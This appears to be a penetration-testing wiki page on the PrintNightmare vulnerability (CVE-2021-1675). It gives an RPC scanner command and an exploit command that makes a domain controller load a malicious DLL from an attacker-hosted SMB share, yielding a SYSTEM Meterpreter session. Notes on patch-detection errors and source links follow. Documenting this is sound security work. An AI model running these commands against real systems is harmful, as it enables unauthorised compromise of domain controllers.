Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Scanner
  • Exploit
  • Maybe fixed | Error
  • Sources

Was this helpful?

  1. Active Directory 101

PrintNightmare

PreviousDumping Active Directory DNS using adidnsdumpNextFrom DFSCoercer to DA

Last updated 2 years ago

Was this helpful?

Scanner

python3 /usr/share/doc/python3-impacket/examples/rpcdump.py @10.20.11.x | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

Massive scanner:

Exploit

python3 ./CVE-2021-1675.py purple.lab/pentest:Password123@10.0.0.1 '\\10.0.0.7\smb\pentestlab.dll'

The python script will attempt to bind to the Print Service and identify the driver path. Then will execute the malicious driver from the UNC path. The “multi/handler” Metasploit module was used in order to capture the connection. Looking at the Meterpreter session SYSTEM level privileges have been obtained on the domain controller. This is because the malicious driver was executed under the context of the Print Spooler service and not from the perspective of the user.

Maybe fixed | Error

In this case, the error is returned for RpcEnumPrinterDrivers. I don't know in detail if this is also a valid sign of a patched system, but it does seem likely.

Sources

A scanner has been also incorporated to which is a tool that can benchmark the security posture of an active directory. The “spooler” from the scanner menu can scan all hosts on the domain, only servers, only workstation or only the domain controllers.

The Impacket implementation of PrintNightmare was developed by and could be found in the GitHub repository. The current version of Impacket produce errors while attempting to exploit the PrintNightmare vulnerability through the python script. Therefore it is recommended to use the version which is included in the repository. The script requires domain user credentials, the IP address of the domain controller and the UNC path which the DLL is hosted.

0x8001011b is the error code for RPC_E_ACCESS_DENIED. I know that this is an indication of a fixed system when returned for RpcAddPrinterDriver (see, e.g., the functionality of ).

seems to reference the same issue, so I am cross-referencing it here in case others are looking for an answer.

PingCastle
Cube0x0
CVE-2021-1675
https://github.com/ly4k/PrintNightmare
#59
https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
LogoGitHub - vletoux/pingcastle: PingCastle - Get Active Directory Security at 80% in 20% of the timeGitHub
LogoGitHub - byt3bl33d3r/ItWasAllADream: A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCEGitHub
LogoPrintNightmare – Penetration Testing LabPenetration Testing Lab